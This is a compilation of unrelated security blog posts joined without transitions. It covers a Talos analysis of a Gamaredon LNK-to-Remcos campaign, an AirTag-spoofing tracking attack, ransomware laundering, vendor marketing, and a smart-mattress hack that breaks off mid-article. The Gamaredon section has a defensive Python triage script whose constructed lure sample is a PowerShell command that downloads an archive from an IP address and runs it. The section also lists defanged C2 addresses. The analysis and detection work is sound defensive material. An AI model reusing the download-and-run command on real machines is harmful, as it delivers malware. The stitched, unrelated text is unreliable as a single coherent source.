Welcome to Cisco Talos’ 2024 Year in Review, available for download now. This report is powered by threat telemetry from over 46 million global devices across 193 countries and regions, amounting to more than 886 billion security events per day.
Explore key insights in topics including the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. With Talos’ informed analysis and recommendations, you can strategically prioritize your defenses to stay ahead in 2025.
2024’s Threat Actor Playbook: Stealth and Simplicity
This year, cybercriminals leaned heavily on stealth and efficiency, favoring straightforward techniques over complex malware and zero-day exploits. Here’s what else stood out:
Identity-based attacks were particularly noteworthy, accounting for 60% of Cisco Talos Incident Response cases.
Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors.
Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of cases. They also targeted education entities more than any other sector in 2024, a trend in line with previous years.
Based on Cisco Duo data, identity and access management (IAM) applications were most frequently targeted in MFA attacks, accounting for nearly a quarter of related incidents.
Threat actor use of AI and machine learning largely fell short of industry projections, with actors relying on these technologies to enhance their techniques rather than aid in the creation of new ones.
Want some quick insights? Here’s a two-minute overview of key findings:
Stay informed
Download Talos’ 2024 Year in Review today, and bookmark our landing page to access forthcoming exclusive interviews with Talos experts, videos, podcasts and more.
Cisco Talos is actively tracking an ongoing campaign, active since at least November 2024, that targets users in Ukraine with malicious LNK files which run a PowerShell downloader.
The file names use Russian words related to the movement of troops in Ukraine as a lure.
The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second-stage ZIP file containing the Remcos backdoor.
The second-stage payload uses DLL sideloading to execute the Remcos payload.
Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group.
Phishing campaign using the invasion of Ukraine as a theme
The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion.
Although Talos was not able to pinpoint the exact method by which these files are distributed, it is likely that Gamaredon continues to send phishing e-mails with either the ZIP file directly attached to it or containing a URL link to download the file from a remote host.
Below are some examples of file names used in this campaign:
Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk
Позиции противника запад и юго-запад.xlsx.lnk
Positions of the enemy west and southwest.xlsx.lnk
РИБАК Станіслав Вікторович.docx.lnk
RYBAK Stanislav Viktorovich.docx.lnk
ШАШИЛО Олександр Віталійович.docx.lnk
SHASHILO Oleksandr Vitaliyevich.docx.lnk
The translation for these names shows the intent of this campaign in using a war-related theme. We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements in the region of conflict.
These files contain metadata indicating that only two machines were used to create the malicious shortcut files. As we mentioned in a previous blog, Gamaredon tends to use a short list of machines when creating the LNK files for their campaigns, and the ones used in this campaign were previously seen by Talos in incidents related to this threat group.
The LNK files contain PowerShell code used to download and execute the next stage payload, as well as a decoy file which is shown to the user after the infection occurs as a way to disguise the compromise.
The PowerShell code uses the cmdlet Get-Command to indirectly execute the functions to download and execute the payload, which could be an attempt to bypass string-based detection by antivirus solutions.
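As an added example (not Talos’ code), the following Python triage routine applies the traits the report describes to a shortcut’s file name and command line: the document-style double extension, the Get-Command indirection, a download from a bare IP address, and a ZIP archive staged in %TEMP% (described further below). The sample names and command lines are constructed for the example, and the IP is a documentation address, not an indicator from the campaign.

```python
"""Triage heuristics for LNK lures of the kind described in the report.

Added example, not Talos' code. The command lines and file names below are
constructed; the heuristics follow the behaviours the report describes.
"""
import re
from dataclasses import dataclass, field

# Extensions the lures imitate: an Office-style document name with ".lnk" appended.
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt")

# Each pattern is paired with a human-readable reason for the analyst.
CMD_CHECKS = [
    (re.compile(r"&\s*\(\s*get-command\b", re.I),
     "cmdlet resolved indirectly via Get-Command and invoked with '&'"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
     "download from a bare IP address instead of a hostname"),
    (re.compile(r"(?:\$env:temp|%temp%)[^;]*?\.zip", re.I),
     "ZIP archive staged in %TEMP%"),
    (re.compile(r"\b(?:expand-archive|start-process)\b", re.I),
     "archive extracted or child process started from the shortcut"),
]


@dataclass
class LnkVerdict:
    name: str
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One weak signal is noise; two independent ones warrant an analyst's look.
        return len(self.reasons) >= 2


def check_name(name: str) -> list[str]:
    """Flag 'document.xlsx.lnk' style double extensions."""
    lower = name.lower()
    if not lower.endswith(".lnk"):
        return []
    stem = lower[:-4]
    if stem.endswith(DOC_EXTS):
        return ["document extension hidden behind .lnk (double extension)"]
    return []


def check_command(cmd: str) -> list[str]:
    """Run every pattern against the shortcut's target plus arguments."""
    return [reason for pat, reason in CMD_CHECKS if pat.search(cmd)]


def analyze_lnk(name: str, command_line: str) -> LnkVerdict:
    """Combine file-name and command-line signals into one verdict."""
    verdict = LnkVerdict(name)
    verdict.reasons += check_name(name)
    # Only PowerShell launchers are inspected; other targets get the name check alone.
    if re.search(r"\bpowershell(?:\.exe)?\b", command_line, re.I):
        verdict.reasons += check_command(command_line)
    return verdict


# Constructed samples (not from the campaign): a real Excel shortcut and a lure.
BENIGN = ("Budget.lnk",
          r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Budget.xlsx')
LURE = ("Positions of the enemy west and southwest.xlsx.lnk",
        'powershell.exe -nop -c "& (Get-Command Invoke-WebRequest) '
        'http://203.0.113.5/p.zip -OutFile $env:TEMP\\p.zip; '
        '& (Get-Command Expand-Archive) $env:TEMP\\p.zip $env:TEMP\\p; '
        'Start-Process $env:TEMP\\p\\TiVoDiag.exe"')

if __name__ == "__main__":
    for name, cmd in (BENIGN, LURE):
        v = analyze_lnk(name, cmd)
        print(f"{name}: {'SUSPICIOUS' if v.suspicious else 'clean'}")
        for r in v.reasons:
            print("  -", r)
```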
The servers used in this campaign are based out of Germany and Russia, and at the time of our assessment, all of them return HTTP error 403 when attempting to download the payload files.
That indicates that either the files were taken offline, or access to the file is being restricted. Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine. We have found evidence in public sample databases that these servers were still hosting the files for specific regions while returning access denied errors in our tests, like this sample available in the “Any.run” public sandbox:
The servers used in this campaign are mostly hosted by two Internet Service Providers (ISPs), GTHost and HyperHosting:
IP                     ASN    ISP
146[.]185[.]233[.]96   63023  gthost
146[.]185[.]233[.]101  63023  gthost
146[.]185[.]239[.]45   63023  gthost
80[.]66[.]79[.]91      60602  hyperhosting
80[.]66[.]79[.]195     60602  hyperhosting
81[.]19[.]131[.]95     63023  ispipoceanllc
80[.]66[.]79[.]159     60602  hyperhosting
80[.]66[.]79[.]200     60602  hyperhosting
80[.]66[.]79[.]155     60602  hyperhosting
146[.]185[.]239[.]51   63023  gthost
146[.]185[.]233[.]90   63023  gthost
146[.]185[.]233[.]97   63023  gthost
146[.]185[.]233[.]98   63023  gthost
146[.]185[.]239[.]47   63023  gthost
146[.]185[.]239[.]56   63023  gthost
146[.]185[.]239[.]33   63023  gthost
146[.]185[.]239[.]60   63023  gthost
These servers are used to distribute the payload and the decoy document, but Talos found evidence of at least one server being used as the Command and Control (C2) server for the Remcos backdoor.
We have also found evidence of an interesting artifact in the DNS resolution for some of these servers. Even though all communication with these servers is done directly via the IP address, the reverse DNS records for some of these IPs show an invalid entry that is quite unique:
While this doesn’t necessarily mean the attackers manually changed these records, it did help uncover at least two additional IPs matching the characteristics of the other servers in this campaign:
DLL sideloading used to load Remcos backdoor
Gamaredon has previously been known to use custom scripts and tools in their attack chains, but Talos has observed the use of Remcos backdoor as an alternative tool in their campaigns.
Once the ZIP payload is downloaded from the servers, it is extracted to the %TEMP% folder and executed. The binary which is executed is a clean application, which in turn loads the malicious DLL via the DLL sideloading method. This DLL is actually a malicious loader which decrypts and executes the final Remcos payload from encrypted files found within the ZIP.
The PowerShell files we observed downloading the ZIP files contain hints of various applications being abused for DLL side loading, and they contain a mix of clean and malicious files:
DefenderUpdate/DPMHelper.exe
DefenderUpdate/DZIPR.exe
DefenderUpdate/IDRBackup.exe
DefenderUpdate/IUService.exe
DefenderUpdate/madHcCtrl.exe
DefenderUpdate/palemoon.exe
Drvx64/Compil32.exe
Drvx64/IsCabView.exe
Drvx64/TiVoDiag.exe
Drvx64/WiseTurbo.exe
SecurityCheck/Mp3tag.exe
SysDrive/AcroBroker.exe
SysDrive/DPMHelper.exe
SysDrive/IsCabView.exe
SysDrive/palemoon.exe
SysDrive/SbieSvc.exe
SysDrive/steamerrorreporter64.exe
SysDrive/TiVoDiag.exe
SysDrive/vmhost.exe
We can see in the previously mentioned sample downloaded by “Any.run” that it contains the clean application TivoDiag.exe, as well as two DLLs. The file “mindclient.dll” is the malicious DLL which is loaded by “TivoDiag.exe” during execution.
The payload binary is a typical Remcos backdoor which is injected into Explorer.exe. It communicates with the C2 server 146[.]185[.]233[.]96 on port 6856:
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for this threat:
Snort 2: 64707, 64708
Snort 3: 301171
Indicators of Compromise
IOCs for this threat can be found in our GitHub repository here.
The Globee Awards is an annual competition celebrating companies in various fields, including technology-related businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category.
Thank You!
It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals.
A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.
The Value We Bring
Among the advantages of our product that especially benefit businesses, the following were highlighted:
Real-time analysis and constant updates: we always keep our users up-to-date on emerging threats and give them the opportunity to analyze potentially dangerous files in seconds.
Safety of sensitive data: our private mode allows you to upload any info that must stay confidential. No one but you will have access to it. ANY.RUN fully complies with SOC 2 and GDPR.
Lowering financial risks: with ANY.RUN’s sandbox, SOC specialists can react to threats fast, thus minimizing harmful consequences or avoiding them altogether. As a result, the company budget won’t suffer.
We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee.
Cybersecurity at Globee Awards 2025
San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats:
We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.
But a recent study by security researchers has surprisingly found that remote tracking doesn’t even depend on buying an AirTag or ever being physically near the target. If you manage to sneak special malware onto someone’s Windows, Android, or Linux device (like a computer or phone), it could use the device’s Bluetooth to send out a signal that nearby Apple devices would think is coming from an AirTag. Essentially, for Apple devices, the infected phone or computer effectively becomes an oversized AirTag – trackable via the Find My network, which boasts over a billion Apple phones and tablets.
Anatomy of the attack
The attack exploits two features of the Find My technology.
Firstly, this network uses end-to-end encryption – so participants don’t know whose signals they’re relaying. To exchange information, an AirTag and its owner’s phone rely on a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply transmit the AirTag’s geolocation data to Apple servers. The data is encrypted with the lost AirTag’s public key.
Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.
Another feature of Find My is that detectors don’t verify whether the location signal indeed originated with an Apple device. Any devices that support Bluetooth Low Energy (BLE) can broadcast it.
To exploit these features, the researchers came up with the following method:
They install malware on a computer, phone, or some other device running Android, Windows, or Linux, and check the Bluetooth adapter address.
The attackers’ server receives the information and uses powerful video cards to generate a pair of encryption keys specific to the device’s Bluetooth address and compatible with Apple’s Find My network.
The public key is sent back to the infected device, and the malware then starts transmitting a Bluetooth message that mimics AirTag signals and includes this key.
Any nearby Apple device connected to the internet receives the Bluetooth message and relays it to the Find My network.
The attackers’ server uses the private key to request the location of the infected device from Find My and decrypt the data.
How well does the tracking work?
The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.
Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details are slightly different depending on the platform. On Linux devices, the attack only requires infecting the victim’s gadget due to the specific Bluetooth implementation. By contrast, Android and Windows employ Bluetooth address randomization, meaning the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to obtain its adapter address.
The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.
Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.
Another key part of the attack involves calculating cryptographic keys on the server. Due to the complexity of this operation – which requires leasing hardware with modern video cards – the cost of generating a key for a single victim is estimated at around $2.2. For this reason, we find mass-tracking scenarios that target, say, visitors inside a shopping center, to be unlikely. However, targeted attacks at this price point are accessible to virtually anyone, including scammers or nosy co-workers and spouses.
Apple’s response
The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.
How to protect yourself from the attack
Turn off Bluetooth when you’re not using it if your device has the option.
When installing apps, stick to trusted sources only. Verify that the app has been around for a long time, and has many downloads and a high rating in its latest version.
Only grant Bluetooth and location access to apps if you’re certain you need those features.
Regularly update your device: both the OS and main apps.
Make sure you have comprehensive malware protection enabled on all your devices. We recommend Kaspersky Premium.
Besides this rather unusual and as-yet-unseen-in-the-wild tracking method, there are numerous other ways your location and activities can be tracked. What methods are being used to spy on you? Read these for the details:
Welcome to this week’s edition of the Threat Source newsletter.
Howdy friends! One of the things I learned early on in cyber security is that crime does, in fact, pay. It can pay very well, actually. If it didn’t, we wouldn’t have ransomware cartels raking in obscene amounts of money year after year. Ransomware victims pay ransoms with cryptocurrency — typically Bitcoin. A criminal who has their ill-gotten BTC gains then needs to introduce it into a banking system that lets them spend that cryptocurrency with no questions asked.
You might be unsurprised to learn that that isn’t as easy as it sounds, but it’s also not a new problem. In the 1980s, South American drug cartels had a similar issue. They were making obscene amounts of money and had massive piles of cash. However, one cannot show up and start dropping massive amounts of money buying very expensive things without drawing legal attention. Plus, it turns out, cash was the preferred way to bribe corrupt officials. As a result, they found legal and banking loopholes, and less than reputable financial practices in the U.S. and in other countries, to inject ill-gotten money into a legitimate banking system where they could access the funds.
This is called money laundering, and it is at the heart of every successful organized crime organization. Money Laundering 101 is done in three basic steps: Placement, Layering, and Integration.
Placement: You need to get your money into the financial system(s).
Layering: You need to move the money around so it’s harder to trace and to link it to the crime.
Integration: Now that the connection to the crime is obfuscated, you can spend that money. You can invest it, buy expensive cars, or whatever. That money is now in someone else’s pocket. I used to joke that Ferrari dealerships don’t exactly accept cryptocurrency, but it turns out that joke is now on me. More and more businesses now accept cryptocurrency as a direct means of payment it seems.
We often think of the crime of ransomware attacks at the point of impact and victimization, but rarely do we think of the reverse — the money that is paid out that flows back into the cartel and its affiliates. Cryptocurrency is fantastic for money laundering. It lags far behind regulatory standards, is largely anonymous, and can be “mixed” and directed to decentralized exchanges where Know Your Customer (KYC) and Anti-Money Laundering (AML) controls are not applied.
So why am I bringing this up? Well, law enforcement attacking money laundering infrastructure really works. If you can impact how criminals launder their money, you put the brakes on the crime itself happening. After all, what good are the spoils of crime if you can’t do anything with them?
My fear is that regulatory climates have shifted, which will allow laundering to more easily happen. Time will tell if I’m right, and I don’t want to be.
The one big thing
I’m a huge fanboy for clever evasion tactics. Cascading Style Sheets (CSS) evasion in spam emails is just a wicked cool trick. Game knows game, and I have to say, this is super smart. Spam filters play a constant cat-and-mouse game against adversaries. It goes to show that the threat actors are always innovating neat tricks to exploit victims.
Why do I care?
Spam emails account for a massive threat footprint, especially in enterprise email security. Any attack that sneaks malicious spam emails through a spam filter is worth paying attention to.
So now what?
Knowing is half the battle. Time to look at your email defenses and shore them up. Consider an email proxy service or something similar to help augment your email threat defense.
Top security headlines of the week
Airport outages: Malaysia PM says country rejected $10 million ransom demand (The Record)
Satellites! I am an absolute sucker for space hacking. ENISA released a great guide on securing commercial space assets. (ENISA)
One-click phishing attacks: Google hastily patched a Chrome zero-day vulnerability exploited by an APT. (Dark Reading)
Can’t get enough Talos?
Patch Tuesday was a doozy this time. Check out our blog post here.
Also, keep your eyes peeled: Talos’ 2024 Year in Review will be available for download on Monday, Mar. 31.
It’s a rare company these days that doesn’t boast about using artificial intelligence (AI). And often no explanation is forthcoming as to why AI is needed or, more importantly, how it’s implemented — just the mere presence of AI, it seems, is enough to make a product more valuable, innovative and high-tech. Kaspersky advocates a different approach: we don’t just say “we use AI”, but explain exactly how we deploy machine learning (ML) and AI technologies in our solutions. It’d take too long to list all our AI technologies in a single post given that we have an entire expertise center — Kaspersky AI Technology Research — that deals with all aspects of AI. So my sole focus here will be on those technologies that make life easier for SIEM analysts working with the Kaspersky Unified Monitoring and Analysis Platform.
SIEM AI Asset Risk Scoring
In traditional systems, one of the most resource-intensive tasks of the SIEM analyst is prioritizing alerts — especially if the system has just been installed and works out of the box with default correlation rules not yet fine-tuned to the infrastructure of a specific company. Big data analytics and AI systems can help here. Armed with SIEM AI Asset Risk Scoring, monitoring and response teams can prioritize alerts and prevent potential damage. The module assesses asset risks by analyzing historical data and prioritizing incoming alerts, which speeds up triage and generates hypotheses that can be used for proactive searches.
Based on information about activated correlation rule chains, SIEM AI Asset Risk Scoring lets you build patterns of normal activity on endpoints. Then, by comparing daily activity with these patterns, the module identifies anomalies (for example, sudden traffic spikes or multiple service requests) that may signal a real incident and prompt the analyst to take a deeper look into these alerts. This way, the problem is detected early, before any damage is done.
AI-Powered OSINT IoCs
Analysts working with the Kaspersky Unified Monitoring and Analysis Platform also have the option to use additional contextual information from open sources through the Kaspersky Threat Intelligence Portal. After the latest update, the portal now provides access to threat intelligence collected using a generative AI model.
It works as follows: let’s say you’ve found a suspicious file during a threat hunt. You can take this file’s hash and look it up on the site, and if someone else has already encountered it during an incident investigation and published something about it, the technology will instantly show you indicators of compromise (IoCs) and key facts about the threat. Without such an automation system, it can take the analyst many hours to find and review this information — especially if there are lots of materials and they’re written in different languages. Our system, built on an internal LLM, can automate this process: it analyzes all reports and mentions of the threat whatever the language, extracts the essence, and presents a summary: the nature of the threat, the date it was first detected, cybercriminal groups associated with it, industries most often targeted using the file, and so on. This saves the analyst an enormous amount of time on searching and researching.
What’s more, the analyst has access to other Kaspersky Threat Intelligence data, including information generated using AI technologies and big data analytics. Our threat intelligence databases are continuously updated with the results of manual APT research, live data from the darknet, information from the Kaspersky Security Network, and regular analysis of new malware. All of these technologies help users minimize the potential damage from cyber-incidents and reduce the Mean Time to Respond (MTTR) and the Mean Time to Detect (MTTD).
We continue to improve the usability and performance of our SIEM system, with a focus on deploying AI to free information security employees from even more routine tasks. Follow updates of the Kaspersky Unified Monitoring and Analysis Platform on the official product page.
Cyber threat intelligence is all about data: its collection, exploration and research, extracting actionable insight. If you employ any intelligence solution, it is vital to understand what data sources it relies on and what kind of information they deliver.
In ANY.RUN’s Threat Intelligence Lookup and TI Feeds, we leverage fresh data from millions of sandbox analyses performed by thousands of organizations and hundreds of thousands of researchers.
Here is how it works.
Where Threat Intelligence Comes From
TI Lookup lets you access fresh threat intelligence on active malware and phishing attacks
Over 500,000 security professionals worldwide, including SOC teams from 15,000 companies, use ANY.RUN’s Interactive Sandbox daily to analyze suspicious links and files related to the latest cyber attacks. They check alleged phishing emails, explore potential breach attempts, investigate incidents, and collect critical insights into malicious behavior.
Thanks to ANY.RUN’s proprietary technology, we extract IOCs, IOAs, IOBs, and TTPs from the analyzed samples and enrich Threat Intelligence Lookup and TI Feeds with a continuous inflow of threat data which is:
Real and Exclusive: Companies submit files and URLs related to actual attacks on their infrastructure. The data extracted from these submissions is often unique and cannot be found in any other sources.
Up-to-date: The data belongs to recent or ongoing cyber attacks, including active campaigns and emerging malware.
Actionable: SOC teams often submit samples as part of proactive threat hunting or incident response, contributing to a dataset that helps you predict and prevent future attacks.
ANY.RUN provides free TI Feeds samples in STIX and MISP
The wealth of data on the latest cyber threats available in Threat Intelligence Lookup and TI Feeds enables organizations like yours to:
Quickly Detect and Prevent Attacks, avoiding operational disruption and further damage.
Enhance SOC Efficiency, providing teams with access to current and relevant data and enabling them to defend the company’s assets and infrastructure proactively.
Boost Mitigation and Response, minimizing the cost of incidents and financial and reputational losses.
You can investigate, search, and get a direct stream of IOCs, IOAs, and IOBs in your company to strengthen your proactive defenses against ongoing malware and phishing attacks.
Examples of Unique Threat Intelligence on Active Cyber Attacks
One of the scenarios where threat data from companies serves other companies through the agency of ANY.RUN’s tools is industry-wide malware campaigns. Organizations that were the first to face incidents help others to anticipate and prevent them.
1. Interlock Ransomware Attacks on US Healthcare
In late 2024, the Interlock ransomware group launched targeted attacks against multiple healthcare facilities in the United States, causing significant disruptions and exposing sensitive patient data.
Threat Intelligence Lookup had data on the threat almost one month before the first reports emerged. This helped our users take preventative measures long before public alerts were raised. For example, one of the malicious domains that distributed the ransomware appeared in submitted samples in September.
The earliest samples with Interlock ransomware found via TI Lookup
Besides gathering IOCs for monitoring, detection and alerting, security teams were able to see inside sandbox sessions what the malicious websites and pages looked like, and to train employees to recognize and avoid similar threats in the future.
Malicious website opened in the Interactive Sandbox
Finally, ANY.RUN's data enriched the understanding of the attacks and their evolution.
ANY.RUN reports with analysis of Interlock’s fake updater programs
While public reports stated that the attackers used malware disguised as a Google Chrome updater, ANY.RUN data showed additional lures mimicking Microsoft Teams and Microsoft Edge updates (evident in filenames such as MSTeamsSetup.exe and MicrosoftEdgeSetup.exe).
2. Nitrogen Ransomware Attacks on Fintech
Financial services have been one of cybercriminals' most targeted sectors in recent years. The Nitrogen ransomware case closely resembles the Interlock case in healthcare: because thousands of companies use ANY.RUN, information on the new threat appeared quickly in our services, giving other companies the opportunity to protect themselves and set up detection and alerts.
The group was first reported about half a year ago, months after its attacks began, and public information about it remains scarce. That makes the data in Threat Intelligence Lookup all the more valuable, since it lets users interconnect, contextualize, and further explore it.
For example, the first analytical report on the Nitrogen group, by StreamScan, mentions the file truesight.sys in its dissection of the attack. This is a legitimate driver, one of those often abused by attackers to evade detection. The StreamScan report, however, does not contain or link to any malware samples or analyses featuring abuse of this driver.
Searching TI Lookup for this file name returns relevant samples:
TI Lookup contains numerous samples belonging to Nitrogen attacks
Searching for this file in TI Lookup surfaces dozens of analysis tasks in which the driver was spotted, showing how the malware behaves and which IOCs are associated with truesight.sys abuse. The same search also turns up other malware with similar mechanics.
Conclusion
Threat Intelligence Lookup and TI Feeds offer a wealth of threat data on the latest cyber attacks. From IOCs, IOAs, and IOBs to TTPs, you can easily gain valuable context on any piece of intelligence and get a constant stream of up-to-date indicators delivered directly to your detection systems. With ANY.RUN, you get actionable threat intelligence to help your business build strong, scalable, and efficient protection against ongoing and emerging threats.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
Posted by admin, 2025-03-27 12:06:49: How We Enrich TI Lookup and Feeds with Fresh Threat Data from 15,000 Organizations
For a while after we wrote about hacking a bicycle, it seemed it couldn’t be beat as the most unlikely hack target ever. However, developers’ imagination seems to know no bounds — and hackers aren’t far behind in their ingenuity…
And so, here’s introducing the internet-connected mattress system — or “Pod” as it’s called — made by the company Eight Sleep, along with several ways it can be hacked as discovered by security researcher Dylan Ayrey.
Smart mattress Pod? What’s that?
Perhaps we should start by explaining what an Eight Sleep Pod is and why someone might want to buy this futuristic piece of tech. The Eight Sleep designers position their product as an “Intelligent Bed Cooling System”. The primary target audience is people with various sleep problems: insomnia, poor sleep quality, snoring, and similar issues that can significantly impact quality of life.
The Pod is made up of a sheet-like “high-tech layer” (“Cover”), and an external unit (“Hub”); optionally there’s also a motorized “Base”. It allows users to adjust the temperature of the bed — heating it up or cooling it down as instructed by the owner. It can do it automatically too — more on this later. There’s a network of tubes with water circulating through them built into it. The external unit connected to this system handles the heating and cooling. The Eight Sleep Pod is divided into two independent zones of a double-bed — each with its own settings. The temperature range is fairly broad: from 12 to 43°C.
At $4699, the Eight Sleep Pod 4 Ultra package is the most expensive version of the system made by the company
But wait: there’s more to it! The Pod has several dozen “clinical-grade sensors” that track users’ sleep quality. It also has vibration motors to wake you up, and sensors for ambient temperature and humidity. The ultimate version — the Pod 4 Ultra — comes with a transformable, electronically-controlled bed base.
It goes without saying that the system connects to the internet. It does this via a Wi-Fi receiver in the Hub. Eight Sleep Pods are configured and controlled almost exclusively via an app. We say “almost”, because the latest (and most expensive) generation — Pod 4 — has pressure-sensitive areas on the sides that you can tap to control certain functions.
Autopilot and sleep by subscription
The main software component of an Eight Sleep Pod is the “Autopilot” system, which uses sensors built into the Cover to collect lots of statistics about the quality and quantity of users’ sleep, and generate detailed reports for them. In addition, Autopilot has a number of other interesting options. For example, the system can detect when the user starts snoring and change the geometry of the Base to fix the problem.
Autopilot uses vibration sensors to track snoring, and combats it by adjusting the geometry of the bed base
The Pod also has a physical alarm clock that wakes the user by changing the temperature of the bed and turning on vibration. However, the key Autopilot feature (and the one Eight Sleep touts the most) is, well, autopilot mode. What this does is continuously monitor the users’ sleep quality — automatically adjusting the temperature to ensure the deepest and most comfortable sleep possible.
In case you thought this was an Eight Sleep Pod ad, let’s look at this product’s numerous flaws…
To start with, these things are eye-wateringly expensive: retail prices start at $3000, and the top-of-the-line Pod 4 Ultra costs a whopping $4700.
An Autopilot subscription would set you back at least $200 per year; without it, the most exciting features simply won't work
But the outlay doesn’t end there: the user will almost certainly have to pay for a subscription that costs between $200 and $300 per year. In theory, you could choose not to pay it, but without the subscription most of the smart features remain inactive.
Also, like any modern tech company, Eight Sleep constantly collects data about its users. CEO Matteo Franceschetti talks quite openly about this on X:
Eight Sleep has accumulated data on almost a billion hours of their users' sleep
Smart mattress hack No. 1: developer backdoor
Now let’s shift the focus to why this post was written: hacking this smart-mattress system. Dylan Ayrey, a security researcher, decided to look into Eight Sleep’s security — simply out of curiosity, he said, as Dylan is the happy owner of an Eight Sleep Pod, which helps him with his insomnia.
To begin analyzing the Pod’s security, Ayrey needed a copy of its firmware. Security-conscious vendors don’t just give their firmware away, so trying to find a copy often becomes a quest unto itself. Not so with Eight Sleep. The update server lets anyone who follows the link download the firmware for any of the company’s Pod models, no questions asked.
While examining the code, Dylan found a number of noteworthy things, including an API for remote connection via SSH. Given that an Eight Sleep Pod is essentially a computer running Linux (as many other modern devices are), a connection like this allows running arbitrary code remotely on the mattress pad Hub.
The Eight Sleep Pod firmware was found to contain an API for remote access to the smart mattress
Judging by the email address associated with the SSH public key found in the firmware code, all (or at least many) Eight Sleep engineers could have remote access to any Pod.
Judging by the email address associated with the SSH public key, every Eight Sleep engineer has remote access to any Pod
